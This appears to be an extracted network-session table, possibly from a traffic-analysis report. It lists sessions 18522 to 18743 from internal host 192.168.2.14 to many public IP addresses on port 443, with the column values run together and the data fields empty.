                                      18522192.168.2.145038282.127.32.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18523192.168.2.144670892.132.233.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18524192.168.2.1441346202.134.152.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18525192.168.2.1457316161.155.163.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18526192.168.2.144867261.180.51.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18527192.168.2.1451796187.201.56.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18528192.168.2.145315479.93.122.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18529192.168.2.144921278.202.117.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18530192.168.2.1452574211.214.230.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18531192.168.2.145430888.248.161.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18532192.168.2.143996427.227.149.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18533192.168.2.14350909.150.161.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18534192.168.2.145577276.57.115.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18535192.168.2.1441476207.112.128.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18536192.168.2.146000040.187.70.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18537192.168.2.144096299.217.121.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18538192.168.2.1455548111.2.124.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18539192.168.2.1448074141.121.155.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18540192.168.2.1459324220.60.239.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18541192.168.2.1452172175.92.53.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18542192.168.2.143653892.209.225.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18543192.168.2.1457758213.226.5.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18544192.168.2.1448324163.18.90.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18545192.168.2.145584879.164.10.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18546192.168.2.1457510139.234.204.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18547192.168.2.1446286187.171.254.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18548192.168.2.1459794177.105.182.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18549192.168.2.1457464112.187.179.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18550192.168.2.145222269.158.235.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18551192.168.2.1457944107.11.1.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18552192.168.2.1439030186.13.119.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18553192.168.2.1446940185.54.181.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18554192.168.2.146068090.128.34.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18555192.168.2.1446776186.102.223.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18556192.168.2.1448114141.239.1.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18557192.168.2.1440738177.244.60.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18558192.168.2.1456966145.108.218.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18559192.168.2.145762420.100.93.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18560192.168.2.1444330180.223.181.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18561192.168.2.1451860104.53.113.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18562192.168.2.1437474146.230.81.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18563192.168.2.145780038.64.250.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18564192.168.2.1453436216.134.138.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18565192.168.2.143593873.208.248.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18566192.168.2.145096851.73.185.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18567192.168.2.144444247.67.6.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18568192.168.2.1438268194.141.196.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18569192.168.2.1452806174.249.44.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18570192.168.2.143582623.226.47.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18571192.168.2.1444290101.214.167.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18572192.168.2.1459634216.112.45.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18573192.168.2.144101254.111.115.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18574192.168.2.1443126160.34.116.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18575192.168.2.1440676136.124.243.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18576192.168.2.1453980201.90.222.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18577192.168.2.1454768129.39.139.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18578192.168.2.144988223.101.64.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18579192.168.2.145842059.243.185.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18580192.168.2.1437072167.99.63.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18581192.168.2.1458660119.47.22.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18582192.168.2.1442498162.44.98.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18583192.168.2.1455630187.127.41.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18584192.168.2.1434684135.73.239.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18585192.168.2.1444486147.60.88.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18586192.168.2.145971291.251.151.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18587192.168.2.1457334106.253.173.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18588192.168.2.1438820194.23.206.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18589192.168.2.145400840.158.218.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18590192.168.2.1459468129.117.180.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18591192.168.2.1439804201.166.15.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18592192.168.2.144176612.153.134.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18593192.168.2.1438724102.119.23.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18594192.168.2.144587635.226.194.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18595192.168.2.1451058207.48.17.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18596192.168.2.144190858.65.190.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18597192.168.2.144036218.131.5.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18598192.168.2.144649436.172.12.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18599192.168.2.1436996189.42.75.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18600192.168.2.1444574172.162.29.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18601192.168.2.144821078.122.223.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18602192.168.2.144623824.200.239.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18603192.168.2.145276824.29.55.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18604192.168.2.144303876.26.24.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18605192.168.2.1458126194.71.147.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18606192.168.2.144766423.120.237.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18607192.168.2.1449824111.250.86.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18608192.168.2.143951641.230.213.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18609192.168.2.144341234.58.52.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18610192.168.2.1442288208.158.8.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18611192.168.2.1443802123.171.10.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18612192.168.2.145258825.57.215.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18613192.168.2.144289413.223.158.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18614192.168.2.1448974159.59.255.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18615192.168.2.145133048.174.235.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18616192.168.2.1449236147.159.78.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18617192.168.2.145940090.169.198.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18618192.168.2.1437242162.194.145.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18619192.168.2.143294488.82.26.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18620192.168.2.1453314156.241.232.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18621192.168.2.144074632.13.207.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18622192.168.2.1458722122.200.71.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18623192.168.2.143652241.204.82.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18624192.168.2.1458182107.1.82.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18625192.168.2.1452576113.196.176.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18626192.168.2.145959017.57.49.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18627192.168.2.144474668.234.241.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18628192.168.2.145819298.27.231.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18629192.168.2.144329892.90.15.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18630192.168.2.146094497.64.29.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18631192.168.2.1435364105.92.147.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18632192.168.2.144381245.155.62.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18633192.168.2.143604686.156.248.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18634192.168.2.14396004.146.105.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18635192.168.2.1437756116.146.41.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18636192.168.2.1452920135.152.166.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18637192.168.2.145677839.2.184.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18638192.168.2.1442440112.25.109.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18639192.168.2.1454414176.137.47.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18640192.168.2.1457596219.7.112.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18641192.168.2.14531721.88.50.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18642192.168.2.144012872.171.237.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18643192.168.2.1454050202.60.240.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18644192.168.2.1437352102.154.5.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18645192.168.2.1452842112.35.109.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18646192.168.2.1459188139.47.16.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18647192.168.2.145577257.189.4.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18648192.168.2.1449526155.66.255.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18649192.168.2.1451076143.255.125.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18650192.168.2.144602062.181.74.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18651192.168.2.145203669.168.162.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18652192.168.2.1444366126.230.77.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18653192.168.2.1451736207.168.6.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18654192.168.2.1458242156.33.145.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18655192.168.2.145901035.164.96.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18656192.168.2.1452054212.66.20.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18657192.168.2.144615061.237.20.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18658192.168.2.143700242.251.161.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18659192.168.2.14501701.86.55.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18660192.168.2.1443586176.6.146.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18661192.168.2.1457880132.140.192.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18662192.168.2.1435326177.74.75.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18663192.168.2.1453658194.147.164.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18664192.168.2.1459864128.98.208.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18665192.168.2.1438388124.6.55.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18666192.168.2.1459848189.223.236.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18667192.168.2.1458314116.30.12.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18668192.168.2.1442152154.93.62.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18669192.168.2.1433738145.232.207.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18670192.168.2.1443266201.249.162.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18671192.168.2.144718279.31.162.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18672192.168.2.143735245.74.53.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18673192.168.2.14354182.118.10.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18674192.168.2.1451142158.137.61.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18675192.168.2.1449570206.222.16.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18676192.168.2.1452490189.5.79.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18677192.168.2.1458150194.70.112.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18678192.168.2.1438838159.0.90.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18679192.168.2.1457264166.20.178.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18680192.168.2.144484667.135.19.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18681192.168.2.1449848155.149.114.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18682192.168.2.1449556134.159.79.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18683192.168.2.145161437.72.112.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18684192.168.2.1438044212.99.78.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18685192.168.2.1441466219.115.12.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18686192.168.2.14549905.230.111.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18687192.168.2.1449570162.140.43.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18688192.168.2.1455454147.207.73.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18689192.168.2.1437312171.115.144.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18690192.168.2.145863269.95.135.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18691192.168.2.1449050147.114.207.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18692192.168.2.144628244.107.206.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18693192.168.2.1442430159.154.141.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18694192.168.2.1459344143.56.155.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18695192.168.2.1438646115.167.124.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18696192.168.2.1459018111.107.91.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18697192.168.2.143532852.46.212.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18698192.168.2.1453272134.55.253.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18699192.168.2.144601420.51.141.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18700192.168.2.145896652.123.187.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18701192.168.2.1455844223.216.102.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18702192.168.2.1436210151.120.39.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18703192.168.2.1453760144.119.216.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18704192.168.2.145277234.14.79.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18705192.168.2.1448570146.100.108.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18706192.168.2.1456330192.208.166.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18707192.168.2.1437906133.50.90.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18708192.168.2.1440728210.31.37.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18709192.168.2.1436124165.3.104.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18710192.168.2.1448884211.170.250.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18711192.168.2.145700018.53.126.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18712192.168.2.1459206138.2.58.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18713192.168.2.144629213.61.231.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18714192.168.2.1434834188.190.153.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18715192.168.2.143817859.243.236.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18716192.168.2.1455352190.27.184.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18717192.168.2.143902084.44.185.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18718192.168.2.1441270149.194.180.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18719192.168.2.1435478176.171.97.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18720192.168.2.1458346122.14.164.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18721192.168.2.1453474133.227.140.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18722192.168.2.143583665.48.60.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18723192.168.2.1449474126.27.79.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18724192.168.2.1459760123.159.114.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18725192.168.2.145620864.99.10.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18726192.168.2.144936214.79.29.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18727192.168.2.1444990100.41.233.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18728192.168.2.1435080198.16.30.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18729192.168.2.1436790145.80.51.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18730192.168.2.1441658141.131.72.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18731192.168.2.1459420104.251.59.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18732192.168.2.1456166171.212.254.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18733192.168.2.1449764169.197.97.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18734192.168.2.143672660.23.105.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18735192.168.2.1438152220.20.210.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18736192.168.2.1437360137.195.57.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18737192.168.2.1459454162.110.245.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18738192.168.2.1442346184.213.11.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18739192.168.2.145887475.141.116.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18740192.168.2.145820051.77.59.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18741192.168.2.1456924218.151.76.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18742192.168.2.1450088115.133.78.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18743192.168.2.1440574120.95.76.177443
                                      TimestampBytes transferredDirectionData


